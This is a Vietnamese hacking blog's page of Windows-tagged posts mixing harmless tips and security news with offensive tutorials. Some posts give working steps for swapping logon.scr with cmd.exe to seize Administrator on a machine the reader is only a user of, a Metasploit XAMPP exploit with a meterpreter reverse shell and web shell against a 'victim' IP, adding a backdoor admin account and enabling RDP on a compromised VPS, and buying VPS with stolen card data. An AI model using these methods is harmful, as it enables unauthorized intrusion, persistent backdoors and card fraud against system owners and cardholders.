Hiển thị các bài đăng có nhãn WINDOWS. Hiển thị tất cả bài đăng
Hiển thị các bài đăng có nhãn WINDOWS. Hiển thị tất cả bài đăng

Hack mật khẩu Admin trong Windows XP từ User thường

Bạn chỉ được truy cập vào máy tính Windows với một quyền user thông thường và điều đó khiến bạn bực bội mỗi khi cần cài đặt hay sử dụng một chương trình nào đó. Bài hướng dẫn này sẽ giúp bạn giải tỏa bực bội bằng cách “hack chơi” mật khẩu của Admin mà không cần sử dụng tới một phần mềm thứ ba nào cả.

Lưu ý: Cách này không áp dụng được cho ổ đĩa NTFS

- Vào Start > Run gõ lệnh cmd và nhấn Enter. Cửa sổ lệnh sẽ được mở ra và nhập chính xác các câu lệnh sau:

cd\ trở về thư mục gốc

cd\windows\system32 vào thư mục system32

mkdir hackdir tạo thư mục hackdir

copy logon.scr hackdir\logon.scr sao lưu file logon.scr vào thư mục hackdir

copy cmd.exe hackdir\cmd.exe sao lưu file cmd.exe vào thư mục hackdir

del logon.scr xóa file logon.scr gốc

copy hackdir\cmd.exe logon.scr sao lưu file cmd.exe trong thư mục hackdir trở về system32 và đổi tên thành logon.scr

exit đóng cửa sổ lệnh

- Sau đó khởi động lại máy tính.

Với các câu lệnh trên bạn đã thay đổi file chạy giao diện Windows Welcome thông thường bằng lệnh khởi chạy chương trình cửa sổ lệnh Command Prompt với quyền system chứ không phải quyền user nào cả. Do đó tại cửa sổ lệnh này bạn có thể tiến hành thay đổi mật khẩu của tài khoản Admin trên máy.

Sau khi khởi động lại máy tính, thay vì màn hình Welcome bạn sẽ thấy một cửa sổ lệnh hiện ra.

Tại đây bạn có thể tiến hành theo 1 trong 2 cách sau:

Cách 1: Đổi mật khẩu tài khoản Admin sẵn có

Tại cửa sổ lệnh có thể sử dụng một trong các lệnh sau:

net user <username> <new pass> thay mật khẩu tài khoản quản trị bằng mật khẩu mới
hoặc

net user <username> xóa trắng mật khẩu của tài khoản này

Ví dụ: net user Administrator 123 câu lệnh này đổi mật khẩu tài khoản Administrator thành 123.

Cách 2: Thêm một tài khoản mới với quyền Admin

Tại cửa sổ lệnh lần lượt gõ các lệnh sau:

net user <username> <password> /add thêm một tài khoản với tên và mật khẩu tương ứng

net localgroup Administrators <username> /add đưa tài khoản vừa tạo vào nhóm quản trị

Vậy là thông qua 2 cách này, bạn có thể đăng nhập vào tài khoản vừa tạo hoặc sử dụng mật khẩu vừa đổi của tài khoản Administrator để đăng nhập vào máy tính với quyền quản trị mức cao nhất.

Quan trọng: Đừng quên copy các file trong thư mục hackdir trở về thư mục system32 để hệ thống của bạn hoạt động trở lại như bình thường.

Xem Thêm

 

[Metasploit] Hackeando XAMPP Remotamente (Windows XP - 7 - 8)

xampp

------------------------------------------------------------------------------------------------------------------
XAMPP es una forma fácil de instalar la distribución Apache que contiene MySQL, PHP y Perl. XAMPP es realmente simple de instalar y usar - basta descargarlo, extraerlo y comenzar.
La distribución de Windows 2000, 2003, XP, Vista y 7 contiene Apache, MySQL, PHP + PEAR, Perl, mod_php, mod_perl, mod_ssl, OpenSSL, phpMyAdmin, Webalizer, Mercury Mail Transport System for Win32 and NetWare Systems v3.32, Ming, FileZilla FTP Server, mcrypt, eAccelerator, SQLite, and WEB-DAV + mod_auth_mysql.
------------------------------------------------------------------------------------------------------------------


Actualmente el servicio XAMPP, usado por la mayoria de webmasters y usuarios que se dedican a la Programación Web son totalmente vulnerables y se ha creado un modulo en metasploit que explota contraseñas débiles WebDAV en los servidores XAMPP y utiliza credenciales proporcionadas para subir una carga útil de PHP y ejecutarlo. El exploit se encuentra disponible desde XAMPP WebDAV PHP Upload y los pasos para aprovecharse de esta vulnerabilidad, son los siguientes:

REQUERIMIENTOS:

PROCEDIMIENTOS:

Primeramente tenemos que detectar si la PC victima esta ejecutando el servicio XAMPP, para ello usaremos Nmap, ejecutando el siguiente comando:
  • nmap -sS -T4 -A 192.168.1.38
do875e

Si los resultados se muestran tal cual con la imagen de arriba, quiere decir que la PC victima esta ejecutando el servicio XAMPP en el puerto 80 y 443, entonces para aprovecharnos de la vulnerabilidad mencionada lineas arriba, simplemente abriremos metasploit y ejecutamos los siguientes comandos:
-------------------------------------------------------------------------------------------------------------
use exploit/windows/http/xampp_webdav_upload_php
set payload php/meterpreter/reverse_tcp
set Lhost 192.168.1.36 (Nuestra IP)
set RHOST 192.168.1.38 (IP Victima)
exploit
-------------------------------------------------------------------------------------------------------------
21brxmo
Estos comandos haran que se ejecute un payload en php la cual automaticamente se "subira" en el servicio XAMPP de la PC victima.
k9ez9
Seguidamente si todo se realizo correctamente, recibiremos la session meterpreter gracias al payload que metasploit subio al servicio XAMPP vulnerable.
idatcl
Lo demas ya queda a nuestra total disposicion, en este caso podemos subir una web shell ya que XAMPP es un servicio web, por lo que podemos ingresar desde nuestro navegador a la IP vulnerada y ejecutar comandos desde la shell.
Espero les sirva y practiquen :)

Xem Thêm

 

Kiểm tra các kết nối ẩn vào Internet trong Windows

Kết nối Internet của bạn chậm hơn bình thường? Phải chăng máy tính của bạn đã nhiễm malware, spyware hay adware, chúng đang chạy trong chế độ nền và tiêu tốn băng thông mà bạn không hề biết? Sau đây là vài thủ thuật giúp bạn kiểm tra được các kết nối từ máy tính của bạn vào Internet.

Máy tính của bạn đang kết nối đến những đâu?

Với các phiên bản Windows bạn có thể sử dụng câu lệnh netstat trong command prompt. Nó sẽ đưa ra danh sách tất cả các chương trình đang sử dụng kết nối Internet trong một khoảng thời gian nhất định.

Đầu tiên bạn cần chạy command prompt với quyền admin. Từ menu Start bạn gõ “cmd.exe” trong ô tìm kiếm. Bạn sẽ thấy chương trình cmd.exe, hãy click chuột phải vào chương trình đó và chọn “Run as administrator”.

[Hình: cmd1.jpg]

Nếu có hộp thoại của User Account Control yêu cầu xác nhận, bạn chọn Yes.

[Hình: cmd2.jpg]

Trong command prompt, gõ câu lệnh sau và nhấn Enter:

netstat -abf 5 > activity.txt

Tùy chọn -a sẽ hiển thị tất cả các kết nối và cổng đang chờ kết nối. Tùy chọn -b cho bạn biết ứng dụng nào đang kết nối, và -f sẽ cho biết DNS của mỗi kết nối để dễ hiểu hơn về nơi mà kết nối đang tồn tại. Bạn có thể sử dụng thêm tùy chọn -n nếu bạn muốn hiển thị IP của kết nối tới. Số 5 trong câu lệnh cho biết cứ sau 5 giây thì chương trình sẽ kiểm tra lặp lại một lần và kết quả sẽ được lưu trong file activity.txt.

Chờ trong khoảng 2 phút rồi nhấn Ctrl + C để dừng câu lệnh.

[Hình: cmd3.jpg]

Sau khi kết thúc việc ghi dữ liệu hãy mở file activity.txt bằng trình soạn thảo quen thuộc của bạn. Ở đây chúng tôi dùng Notepad.

Nội dung của file activity.txt sẽ là tất cả các tiến trình trên máy bạn (như trình duyệt, chương trình email, chat...) có kết nối vào Internet trong 2 phút chạy chương trình netstat.

[Hình: cmd4.jpg]

Nếu bạn thấy bất cứ process hay tên, địa chỉ website nào lạ, hãy search thông tin về nó trên Google. Có thể đó là một chương trình hệ thống nhưng cũng có thế đó là một chương trình virus, gián điệp... Dù sao nếu bạn nghi ngờ về nó, hãy tìm kiếm thông tin, hỏi trên các diễn đàn đến khi biết chắc chắn nó là gì.

[Hình: cmd5.jpg]

Dùng chương trình CurrPorts để kiểm tra các kết nối ẩn

Bạn cũng có thể sử dụng một phần mềm miễn phí tên CurrPorts để đơn giản hóa cách thức sàng lọc lấy thông tin. Chương trình này cung cấp một giao diện thân thiện hơn giúp bạn xem tất cả các kết nối TCP/IP và cổng UDP đang mở trên máy tính. CurrPorts là một chương trình portable, bạn không cần phải cài đặt để dùng.

[Hình: CurrPorts.jpg]

Bạn sẽ nhận được một file .zip, giải nén nó và chạy file cports.exe. Chương trình hiển thị rất chi tiết và trực quan về các process, port, IP... bạn có thể lưu thông tin chương trình quét được vào các text hay HTML, XML để tiện cho việc phân tích về sau.

neo0 (Howtogeek)

Xem Thêm

 

Ngăn chặn bị ngắt kết nối khi download trong Windows


Khi đang thực hiện tải các tập tin có dung lượng lớn từ Internet về máy tính. Đột nhiên, Windows rơi vào trạng thái ngủ đông để tiết kiệm năng lượng theo thời gian mặc định đã làm gián đoạn công việc đang thực hiện công việc, tiêu tốn thêm thời gian và phí Intenrnet của bạn.

Bài viết này sẽ giới thiệu một ứng dụng xách tay nhỏ gọn cho phép bạn ngăn chặn các chế độ tự động của Windows như Shutdown, Reboot, Stanby, Turn Off, Hibernation một cách hữu hiệu, ứng dụng có tên Don't Sleep.

[Hình: 11.png]

Don't Sleep là một ứng dụng xách tay không cần cài đặt, sau khi tải về giải nén kích hoạt tập tin thực thi DontSleep.exe để ngăn chặn Windows kích hoạt các chế độ Stanby, Hybrid-Stanby, Hibernation, Reboot, Shutdown nhằm tránh việc mất quyền kiểm soát máy tính của bạn từ các hoạt động ngầm mặc định của Windows. Ngoài ra, ứng dụng cũng có thể ngăn chặn hoạt động của chế độ bảo vệ màn hình để không làm gián đoạn công việc của bạn.

Chức năng

Don't Sleep: cung cấp các tính năng cho phép bạn thực hiện với ứng dụng như:

To-Tray: Hiển thị trên thanh hệ thống.


Hide: Ẩn ứng dụng nếu muốn hiển thị trở lại bạn phải kích hoạt tập tin thực thi dontSleep.exe, không nên sử dụng.


Minimize to tray if Minimize: Hiển thị thu nhỏ trên thanh hệ thống khi bạn muốn thu nhỏ ứng dụng để làm việc với các ứng dụng khác.


Minimize to tray if Close: Hiển thị trên thanh hệ thống khi bạn nhấn đóng cửa sổ ứng dụng.


Enabling the Mini-HTTP feature: Kích hoạt chức năng kết nối với giao thức HTTP qua các cổng mặc định là 8080


Start Parameter: Hiển thị các tham số thực hiện việc vô hiệu hóa các chức năng.


Exit: Thoát khỏi ứng dụng.


System: Cho phép bạn liên kết nhanh với các chức năng của hệ thống như Task Manager, System, Power Config, Desktop, Monitor, Screensaver Timeout, Screensave, User Accounts, System Configuration và System Information.

Nút Option trong khung Blocking ứng dụng cung cấp các chức năng cho phép bạn thực hiện áp đặt thời gian sử dụng với Don't Sleep thông qua 2 tiện ích Program Star, When you reactivate the PC (from stanby...), hiển thị biểu tượng trên thanh hệ thống hoặc khởi động ứng dụng cùng Windows v.v....

Tại khung Timer ứng dụng cung cấp một số tiện ích cho phép bạn thực hiện để kích hoạt lại các tính năng và làm việc với Windows ở các chế độ sau khi thoát khỏi ứng dụng như:

Exit and Stop Blocking: Thoát và ngưng việc vô hiệu hóa các tính năng.


Exit and Shutdown: Thoát và tắt máy tính.


Exit and aggressive Shutdown: Thoát và ép buộc tắt máy tính.


Exit and Standby/Hibernation: Thoát và làm việc với Windows ở chế độ chờ/ngủ đông.


Disable Blocking: Vô hiệu hóa việc ngăn chặn các chế độ của Windows.


Lưu ý: Tác giả khuyên bạn hãy sử dụng chức năng Exit and Stop Blocking để tránh gián đoạn công việc nếu lỡ tay thoát khỏi ứng dụng và không làm tổn hại đến hoạt động của hệ thống khi bị chuyển đổi chế độ một cách bắt buộc.

Link: http://www.download.com.vn/don-t-sleep/download

Xem Thêm

 

Cảnh báo mã độc tấn công Windows AutoRun trở lại

Các nhà cung cấp bảo mật vừa cảnh báo người dùng về một phần mềm độc hại có thể lây nhiễm vào máy tính thông qua một lỗi nổi tiếng AutoRun của Windows được sử dụng để tự động khởi động chương trình trên một thiết bị DVD hoặc USB.

Sự trở lại của mã độc tấn công trong AutoRun là điều rất được quan tâm, đặc biệt khi Windows 7 và Windows 8 không có tính năng tự động khởi động tập tin autorun.inf, và Microsoft cũng đã phát hành 2 bản vá lỗi cho hệ điều hành cũ. Chính vì vậy, các chuyên gia bảo mật tin rằng hoạt động tấn công này chỉ xảy ra thông qua một máy tính chưa được cập nhật bản vá lỗi, hoạt động chia sẻ các thư mục/tập tin và các phương tiện truyền thông mạng xã hội.

microsoft

Một người nào đó chèn ổ flash USB hoặc thẻ nhớ mang theo phần mềm độc hại có thể lây nhiễm vào các máy tính chưa được vá lỗi. Trên hệ thống khác, một mã độc có thể tấn công thông qua các hoạt động chia sẻ trên một mạng và có ai đó nhấp chuột vào một tập tin hoặc thư mục bị nhiễm độc. Trend Micro cũng thông báo rằng phần mềm độc hại cũng có thể lan truyền trên Facebook.

Các nhà cung cấp khác đang theo dõi phần mềm độc hại này, bao gồm McAfee, Symantec, và Sophos. Trong khi hầu hết cho rằng mã độc khai thác thông qua lỗi AutoRun truyền thống thì Sophos lại cho biết hầu hết các máy tính cá nhân của các công ty đang nhiễm bệnh thông qua mạng chia sẻ.

Sophos: Chia sẻ tập tin có khả năng là thủ phạm


Chiến thuật mới nhất

Các phần mềm độc hại mới nhất có khả năng cải trang bản thân như là các tập tin và thư mục trong mạng chia sẻ để lưu trữ trên các thiết bị di động. Chúng cũng sẽ tạo ra các file exe với tên liên quan đến các hoạt động khiêu dâm hoặc một thư mục có tên gọi là password để lôi kéo người dùng bấm vào chúng, theo Sophos.

Phần mềm độc hại sẽ thêm một khóa registry, do đó nó có thể chạy ngay khi máy tính được khởi động. Các biến thể của ứng dụng sẽ vô hiệu hóa tính năng Windows Update để ngăn chặn nạn nhân tải về các bản vá lỗi để vô hiệu hóa các phần mềm độc hại.

Khi một máy tính bị nhiễm độc, ứng dụng sẽ thực hiện theo một quy trình do phần mềm độc hại đặt ra. Nó có khả năng liên lạc với một máy chủ lệnh và kiểm soát các chỉ dẫn. Sophos cảnh báo, chúng cũng có thể tải về các trojan trong gia đình sâu Zeus/Zbot, đánh cắp thông tin ngân hàng trực tuyến,...

Để chống lại các phần mềm độc hại, các chuyên gia bảo mật khuyên người dùng nên vô hiệu hóa tính năng AutoRun trên tất cả các hệ điều hành Windows và hạn chế quyền ghi chèn các tập tin. Tùy thuộc vào nhà cung cấp AV, phần mềm độc hại mới có nhiều tên khác, bao gồm cả W32/VBNA-X, W32/Autorun.worm.aaeb, W32.ChangeUp và WORM_VOBFUS.

Ổ dịch mới nhất được phát hiện chỉ 1,5 năm sau khi Microsoft báo cáo sự sụt giảm lớn trong tỷ lệ lây nhiễm mã độc AutoRun. Cũng theo Microsoft, so với năm 2010 thì trong 5 tháng đầu năm 2011, số lượng phần mềm độc hại liên quan đến AutoRun được phát hiện bởi Microsoft đã giảm 59% trên máy tính Windows XP và 74% trên máy tính Vista.

Theo NLD

Xem Thêm

 

Share Thủ Thuật Lấy Key Nis

I. Giới thiệu.
-X-Men Company đả vắn bóng một thời gian dài sao khi tung ra bản vá lổi Unicode Connection Controls - 1.0.26.
-X-Men Company chính thức giản tán vì những khó khăn. Có lẻ đây là một tin buồn.
-XHIntell là tên cho một khởi đầu mới. Sản phẩm đầu tiên của XHI là XHI Key

II. Sản phẩm
-Mục đích dùng để lấy Key NIS free từ server. Chỉ mất vài giây.

III. Cách dùng
1. Chạy.

2. Nhấn vào Here. Skip ad....
3. Lấy Key và dùng.
http://www.mediafire.com/?ee4je662d7e4w9b
Đã test thành công và được key 118 days nhé , mỗi ip get được 1 key thui nên các bạn đừng có ham hố nhé
Thanks
Nguồn VHU

Xem Thêm

 

[TUT] Hack VPS từ Shell !

đầu tiên execute command trên con shell đó >
net user l33t p4$sword /add 

l33t=username p4$sword=password
Bây giờ để truy cập quản trị cho người sử dụng của bạn> excute command
Code:
net localgroup administrators l33t /add
 Sau đó thực hiện kết nối tới VPS
Nếu VPS một ip tĩnh nhưng không kết nối vào (mstsc) sử dụng các lệnh để cho phép người dùng từ xa:


Code:
reg add "hklm\system\currentControlSet\Control\Terminal Server" /v "AllowTSConnections" /t REG_DWORD /d 0x1 /f
Code:
reg add "hklm\system\currentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d 0x0 /f

Xem Thêm

 

[TUT] VPS Win/Linux UK Chất

Nguyên liệu: CCV live là được, sock VN cũng reg được nhưng tốt nhất là trùng state.
Max cấu hình là 32GB RAM, 8 CPUs:
Có thể tạo được tối đa 10 VPS/ 1 account cloud.

 
Site:  http://www.rackspace.com/
Nó sẽ auto call đếnđọc 4 số PIN, nhập đúng 4 số đấy là activate được acc. Chỗ add CCV thì add con nào live là được, ko cần balance nhiều.

Sau khi activate acc, AE vào đây làm theo hướng dẫn của nó: Comment  !

Xem Thêm

 

Một số lời khuyên đơn giản cho việc bảo vệ máy tính

1. Không sử dụng các keygen, các phần mềm crack, vì đó là nơi virus thường ẩn náu.
2. Luôn cập nhật Windows của bạn (cập nhật các phần mềm, bản sửa lỗi bảo mật, bản vá lỗi, gói dịch vụ của Windows).
3. Sao lưu dữ liệu quan trọng của bạn thường xuyên. Có thể bỏ dữ liệu quan trọng vào USB, CD hoặc đưa lên MediaFire,…

4. Sử dụng "chỉ" duy nhất một chương trình Anti Virus tốt.
5. Không nên mở file đính kèm email từ các nguồn không rõ hoặc các tập tin được gửi thông qua một tin nhắn.
6. Chỉ tải về phần mềm từ các nguồn đáng tin cậy.
7. Sử dụng mật khẩu mạnh. Mật khẩu nên có ít nhất tám ký tự và có chữ hoa, chữ thường, số, và các ký hiệu (@, #, &,%, *).
8. Vô hiệu hoá các Plug-in không cần thiết trong trình duyệt web của bạn. Nó sẽ giúp giữ cho bạn an toàn từ các virus độc hại.
9. Đừng đưa ra tên đầy đủ của bạn, địa chỉ, số điện thoại, hoặc thông tin cá nhân khác để bất cứ ai bạn không biết hoặc không có một nhu cầu chính đáng (trong người, qua điện thoại, qua email, hoặc Internet).
10. Tắt máy tính của bạn khi bạn không sử dụng nó. Nếu máy tính có kết nối mạng, nó có thể được tiếp xúc với một cuộc tấn công.
11. Thay thế chương trình dễ bị theo dõi (ví dụ như thay IE bằng Google Chrome hoặc FireFox).
12. Không chia sẻ ảnh trong yahoo với người lạ (virus có thể ở trong tấm ảnh đó,...)
13. Cái này các bác có máu D hay làm. Không vào các trang web đen,…
14. Bỏ chọn dấu tích khi cài các phần mềm miễn phí, thường kèm theo các toolbar của các hãng khác. Khi đã lỡ cài rồi thì nên gỡ ngay để tránh gây khó chịu khi lướt web và nặng máy!

P/S: Chúng ta hãy sử dụng các key MAK để kích hoạt bản quyền cho Windows 7 Professional, tránh dùng keygen hay công cụ bẻ khóa! (DEV_PRO)


Xem Thêm

 

Khai thác và phòng chống file upload trong PHP Web Appl

Khai thác và phòng chống file upload trong PHP Web Appl

I. GIỚI THIỆU
Ứng dụng Web hỗ trợ cho phép người sử dụng thực hiện upload file lên server hiện tại có rất nhiều. Ví dụ như upload image(*.gif, *.jpg), *.pdf, *.doc, ...

Trong bài này seamoun sẽ trình bày một số lỗi khi lập trình file upload mà kẻ xấu có thể lợi dụng để upload những mã độc lên server. Những phương thức khai thác mà seamoun trình bày chỉ mang tính tham khảo không ủng hộ các bạn khai thác đối với những server bị mắc lỗi.

Xem Thêm

 

Mở băng DeepFreeze bằng tay

Với 1 máy đã được cài DeepFreeze. Nếu ở chế độ mở băng ta có thể thay đổi bình thường, gỡ bỏ chương trình... Với chế độ đóng băng ta không thể làm gì được. Chương trình DeepFreeze khởi động 1 Driver tên DeepFrz để đóng băng, muốn vô hiệu hóa đóng băng ta sẽ phải tiến hành vô hiệu hóa Driver đó từ HĐH khác.

Xem Thêm

 

Xuất hiện mã khai thác từ xa lỗi 0-day mới của PHP 5.4.3 trên Windows

Vào hôm qua 18/05, một thành viên có nickname là 0in đã gửi lên trang packetstormsecurity.org một mã khai thác từ xa (remote exploit) lợi dụng lỗ hổng trong hàm com_print_typeinfo của PHP phiên bản 5.4.3 dành cho nền tảng Windows.
Trong phần ghi chú, 0in là tác giả của mã khai thác này cho biết, anh ta đã thử nghiệm thành công trên máy Windows XP SP3 được cập nhật đầy đủ các bản vá. Và kết quả là PHP engine sẽ thực thi bất kỳ shellcode nào được chứa trong mã khai thác này.

Hiện vẫn chưa có thông báo và bản vá lỗi chính thức nào từ nhóm phát triển PHP cho lỗi 0-day mới nhất này, nhưng dưới đây là một số biện pháp để hạn chế các rủi ro khác:

• Chặn tất cả các chức năng upload file trong các ứng dụng PHP.
• Sử dụng IPS để lọc các shellcode đã được biết đến, ví dụ các shellcode có trong Metasploit.
• Cập nhật PHP lên phiên bản mới nhất để phòng chống các lỗ hổng khác như CVE-2012-2336 được công bố vào đầu tháng này.
• Sử dụng Host-IPS để chặn bất kỳ các lỗi buffer overflow có thể có trong hệ thống.

(Theo Internet Storm Center (ISC))
Tham khảo:
http://isc.sans.edu/...PoC+in+the+wild
http://packetstormse...rg/files/112851

Nguồn: HVA

Xem Thêm

 

Copyright © Dương-UG Blog's - Nguyễn Bình Dương